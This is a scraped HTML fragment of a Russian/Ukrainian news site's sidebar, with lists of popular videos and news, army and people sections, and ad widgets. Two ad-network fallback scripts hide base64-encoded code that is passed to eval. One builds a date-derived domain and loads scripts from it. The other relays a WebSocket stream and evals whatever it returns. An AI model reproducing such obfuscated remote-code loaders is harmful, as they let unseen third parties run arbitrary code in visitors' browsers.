{id:'zaw-ocifiqifodilibonedana',block:'119650', site_id:'20752'});})(window, 'mtzBlocks');</script></div><br /> <div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_technology/full/601-v-yaponii-prodayut-giperrealistichnye-3d-maski-s-licami-video"><img width="142" height="88" alt="В Японии продают гиперреалистичные 3D-маски с лицами" src="https://enovosty.com/wp-content/uploads/2021/01/2021-01-06-15.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_technology/full/601-v-yaponii-prodayut-giperrealistichnye-3d-maski-s-licami-video">В Японии продают гиперреалистичные 3D-маски с лицами</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news-culture/full/1101-luchshie-uzhasy-2020-ukrainskij-xorror-pokoril-mir-video"><img width="142" height="88" alt="Лучшие ужасы 2020: Украинский хоррор покорил мир" src="https://enovosty.com/wp-content/uploads/2021/01/236343-e1610370009996.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-culture/full/1101-luchshie-uzhasy-2020-ukrainskij-xorror-pokoril-mir-video">Лучшие ужасы 2020: Украинский хоррор покорил мир</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1301-v-indii-sobaka-kazhdyj-den-blagoslovlyaet-posetitelej-xrama"><img width="142" height="88" alt="В Индии собака каждый день благословляет посетителей храма" src="https://enovosty.com/wp-content/uploads/2021/01/1610497517-7833.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1301-v-indii-sobaka-kazhdyj-den-blagoslovlyaet-posetitelej-xrama">В Индии собака каждый день благословляет посетителей храма</a></div></td></tr><tr><td class="view"><span><i></i>5290</span></td><td class="view"><span><i></i>4284</span></td><td class="view last"><span><i></i>2676</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_incidents/full/1101-pod-moskvoj-samosval-protaranil-kolonnu-voennyx-avtobusov-mnogo-pogibshix-ogromnaya-probka-foto-video"><img width="142" height="88" alt="Под Москвой самосвал протаранил колонну военных автобусов. Много погибших, огромная пробка" src="https://enovosty.com/wp-content/uploads/2021/01/bc4a640fa66d14dc9eec5907f6667609-e1610372407257.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/1101-pod-moskvoj-samosval-protaranil-kolonnu-voennyx-avtobusov-mnogo-pogibshix-ogromnaya-probka-foto-video">Под Москвой самосвал протаранил колонну военных автобусов. Много погибших, огромная пробка</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1101-v-gollandii-proizoshel-moshhnyj-vzryv-video"><img width="142" height="88" alt="В Голландии произошел мощный взрыв" src="https://enovosty.com/wp-content/uploads/2021/01/2021-01-11-23.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1101-v-gollandii-proizoshel-moshhnyj-vzryv-video">В Голландии произошел мощный взрыв</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news-culture/full/1101-lokdaun-po-ukrainski-ukraincev-vozmutilo-video-bespredela-policejskix-na-rynke"><img width="142" height="88" alt="Локдаун по-украински: Украинцев возмутило видео беспредела полицейских на рынке" src="https://enovosty.com/wp-content/uploads/2021/01/mery.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-culture/full/1101-lokdaun-po-ukrainski-ukraincev-vozmutilo-video-bespredela-policejskix-na-rynke">Локдаун по-украински: Украинцев возмутило видео беспредела полицейских на рынке</a></div></td></tr><tr><td class="view"><span><i></i>2093</span></td><td class="view"><span><i></i>1634</span></td><td class="view last"><span><i></i>1527</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><br> <div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-stalo-izvestno-kakoj-karantin-zhdyot-ukraincev" rel="bookmark">Стало известно, какой карантин ждёт украинцев</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/1301-v-minkulte-rasskazali-o-vozmozhnosti-prodleniya-karantina" rel="bookmark">В Минкульте рассказали о возможности продления карантина</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/1201-slovar-sovremennogo-ukrainskogo-yazyka-vybral-glavnoe-slovo-2020-go-goda" rel="bookmark">Словарь современного украинского языка выбрал главное слово 2020-го года</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news-culture/full/1101-lokdaun-po-ukrainski-ukraincev-vozmutilo-video-bespredela-policejskix-na-rynke" rel="bookmark">"Локдаун" по-украински: Украинцев возмутило видео беспредела полицейских на рынке</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/zdorove/full/1101-v-minzdrave-ozvuchili-celi-vvedeniya-zhestkogo-karantina-v-ukraine" rel="bookmark">В Минздраве озвучили цели введения жесткого карантина в Украине</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/801-ukraincy-v-kanun-uzhestocheniya-karantina-massovo-pokinuli-stranu" rel="bookmark">Украинцы в канун ужесточения карантина массово покинули страну</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/601-v-ternopole-obyavili-ob-otkaze-ot-lokdauna" rel="bookmark">В Тернополе объявили об отказе от локдауна</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/601-glava-moz-rasskazal-o-perenose-karantina" rel="bookmark">Глава МОЗ рассказал о переносе карантина</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости экономики</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4249,30426', 4249, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4249,30426', 4249, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4249,30426', 4249, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_economy/full/1101-nacbank-rasskazal-kakie-bumazhnye-dengi-ischeznut-v-etom-godu">Нацбанк рассказал, какие бумажные деньги исчезнут в этом году (1915)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1001-v-ukraine-uzhe-s-aprelya-povysyat-pensionnyj-vozrast-kogo-kosnetsya">В Украине уже с апреля повысят пенсионный возраст: кого коснется (1816)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/801-ukraincy-v-kanun-uzhestocheniya-karantina-massovo-pokinuli-stranu">Украинцы в канун ужесточения карантина массово покинули страну (1543)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1201-morozy-na-poroge-cena-na-gaz-v-evrope-bet-rekordy-gts-ukrainy-nedozagruzhena">Морозы на пороге: Цена на газ в Европе бьет рекорды, ГТС Украины недозагружена (582)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1301-zaderzhka-subsidii-2021-chto-proisxodit-i-kogda-pridut-dengi">Задержка субсидии 2021: Что происходит и когда придут деньги (504)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1301-pravitelstvo-zafiksirovalo-cenu-na-gaz-dlya-naseleniya-do-konca-otopitelnogo-sezona">Правительство зафиксировало цену на газ для населения до конца отопительного сезона (436)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1101-shmygal-rasskazal-o-mexanizme-kotoryj-pozvolit-snizit-tarify">Шмыгаль рассказал о механизме, который позволит снизить тарифы (417)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1101-zolotye-yajca-v-yanvare-ceny-na-populyarnyj-produkt-vzletyat-eshhyo-vyshe">"Золотые" яйца: В январе цены на популярный продукт взлетят ещё выше (353)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/1301-rasplata-za-pravdu-forbes-budet-nakazyvat-skazochnikov-donalda-trampa">Расплата за правду: Forbes будет наказывать "сказочников" Дональда Трампа (301)</a></h3><h3 class="press"><a href="https://enovosty.com/news_economy/full/801-cena-nefti-brent-vpervye-za-god-podnyalas-vyshe-55-dollarov-za-barrel">Цена нефти Brent впервые за год поднялась выше 55 долларов за баррель (276)</a></h3></div> </div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4355059"><a href="https://enovosty.com/armiya/full/654-pistolet-pulemet-fort-224" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/05/Pistolet_Fort_224-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/05/Pistolet_Fort_224-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/05/Pistolet_Fort_224-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/05/Pistolet_Fort_224.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/654-pistolet-pulemet-fort-224" >Пистолет-пулемет "Форт-224"</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4369737"><a href="https://enovosty.com/armiya/full/715-bespilotnyj-letatelnyj-apparat-kazhan-1" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/07/kazhan1-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/07/kazhan1-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/07/kazhan1-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/07/kazhan1.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/715-bespilotnyj-letatelnyj-apparat-kazhan-1" >Беспилотный летательный аппарат «Кажан-1»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4397329"><a href="https://enovosty.com/armiya/full/815-snajperskaya-vintovka-kalibra-12-7-mm-pgm-ultima-ratio-hecate-ii-franciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/10/pgm-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/10/pgm-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/10/pgm-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/10/pgm.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/815-snajperskaya-vintovka-kalibra-12-7-mm-pgm-ultima-ratio-hecate-ii-franciya" >Снайперская винтовка калибра 12.7 мм PGM Ultima Ratio Hecate II (Франция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4488159"><a href="https://enovosty.com/armiya/full/443-samolet-an-178" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/12/AN_178-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/12/AN_178-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/12/AN_178-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/12/AN_178.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/443-samolet-an-178" >Самолет Ан-178</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4310233"><a href="https://enovosty.com/person/full/kandelaki-tina" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/08/kandelaki_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/08/kandelaki_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/08/kandelaki_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/kandelaki-tina" >Канделаки<br /> Тина</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4312331"><a href="https://enovosty.com/person/full/alekperov-vagit" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/09/alekperov_vagit_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/09/alekperov_vagit_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/09/alekperov_vagit_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/alekperov-vagit" >Алекперов<br /> Вагит</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4653962"><a href="https://enovosty.com/person/full/1211-yuzhanina-nina" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2017/11/yuzhanina-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2017/11/yuzhanina-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2017/11/yuzhanina.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/1211-yuzhanina-nina" >Южанина<br /> Нина</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4688726"><a href="https://enovosty.com/person/full/2504-igor-mazepa" ><img width="99" height="88" src="https://enovosty.com/wp-content/uploads/2018/04/ind_94621-112x100.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2018/04/ind_94621-112x100.jpg 112w, https://enovosty.com/wp-content/uploads/2018/04/ind_94621-300x269.jpg 300w, https://enovosty.com/wp-content/uploads/2018/04/ind_94621.jpg 350w" sizes="(max-width: 99px) 100vw, 99px" /></a><a class="postTitle" href="https://enovosty.com/person/full/2504-igor-mazepa" >Игорь<br /> Мазепа</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/uk/news_society-ukr/full/1301-golovne-shhob-shkarpetki-ne-kupuvali-v-merezhi-zyavilos-gumoristichne-video-pro-vidpochinok-zelenskogo-v-bukoveli">"Головне, щоб шкарпетки не купували": в мережі з'явилось гумористичне відео про відпочинок Зеленського в Буковелі (4239)</a></p><p class="press"><a href="https://enovosty.com/uk/news-culture-ukr/full/1201-v-ukrainskix-shkolax-zapracyuvav-novij-sanitarnij-reglament-shho-zminilosya">В українських школах запрацював новий санітарний регламент: що змінилося (3698)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1301-v-ukrainu-idut-morozy-kakie-regiony-zasyplet-snegom">В Украину идут морозы: какие регионы засыплет снегом (3395)</a></p><p class="press"><a href="https://enovosty.com/news_kiev/full/1301-v-stolice-podorozhali-otoplenie-i-goryachaya-voda">В столице подорожали отопление и горячая вода (3195)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/1301-pod-kievom-zasekli-neobychnyj-yaponskij-vnedorozhnik-foto">Под Киевом засекли необычный японский внедорожник (ФОТО) (3130)</a></p><p class="press"><a href="https://enovosty.com/uk/news_technology-ukr/full/1201-v-merezhi-zyavilas-kumedna-karikatura-pro-blokuvannya-trampa-v-twitter">В Мережі з'явилась кумедна карикатура про блокування Трампа в Twitter (2958)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1301-v-indii-sobaka-kazhdyj-den-blagoslovlyaet-posetitelej-xrama">В Индии собака каждый день "благословляет" посетителей храма (ВИДЕО) (2685)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1301-v-karpatax-slomalsya-gornolyzhnyj-podemnik-lyudej-snimali-spasateli-foto">В Карпатах сломался горнолыжный подъемник: людей снимали спасатели (ФОТО) (2369)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/1301-v-ukrainu-prishla-zimnyaya-skazka-goroda-zasypalo-snegom-foto">В Украину пришла зимняя сказка: города засыпало снегом (ФОТО) (2203)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1301-novyj-kitajskij-tank-vt4-vpervye-primenili-v-boyu">Новый китайский танк VT4 впервые применили в бою (2131)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/1812-universitet-nash-dom-dom-dolzhen-byt-teplym-yurist-vyacheslav-truba">«Университет — наш дом. Дом должен быть теплым», — юрист Вячеслав Труба</a></p><p class="press"><a href="https://enovosty.com/publications/full/812-gromkoe-xarkovskoe-delo-mozhet-zakonchitsya-pshikom">Олег Кияшко: Громкое «харьковское дело» может закончиться пшиком</a></p></div><div id='div-gpt-ad-1594112815543-0'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594112815543-0'); });</script></div></br><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/901-pobeda-demokratii-v-amerike-priblizhaet-konec-mnogix-diktatur-v-rossii-kitae-belarusi"><img alt="Победа демократии в Америке приближает конец многих диктатур - в России, Китае, Беларуси" src="https://enovosty.com/wp-content/uploads/2021/01/andrey-zubov-300x225-112x84.jpg"><div>Андрей Зубов</div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/901-pobeda-demokratii-v-amerike-priblizhaet-konec-mnogix-diktatur-v-rossii-kitae-belarusi">Победа демократии в Америке приближает конец многих диктатур - в России, Китае, Беларуси</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/901-pobeda-demokratii-v-amerike-priblizhaet-konec-mnogix-diktatur-v-rossii-kitae-belarusi">Такого в Соединенных Штатах еще не было. Столь явная попытка меньшинства навязать свою волю большинству силой.</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_abroad/full/901-sajt-pravitelstva-xabarovskogo-kraya-12-chasov-transliroval-necenzurnuyu-frazu-pro-putina">Сайт правительства Хабаровского края 12 часов транслировал нецензурную фразу про Путина (14452)</a></p><p class="press"><a href="https://enovosty.com/news-culture/full/701-vrach-kotoryj-ne-moetsya-uzhe-pyat-let-udivil-mir-svoej-istoriej">Врач, который не моется уже пять лет, удивил мир своей историей (11901)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/701-trampu-predlozhili-samolet-do-rostova-socseti-s-yumorom-otreagirovali-na-sobytiya">Трампу предложили самолет до Ростова: лучшие мемы и карикатуры дня (8637)</a></p></div></div></div></br><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br> <div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
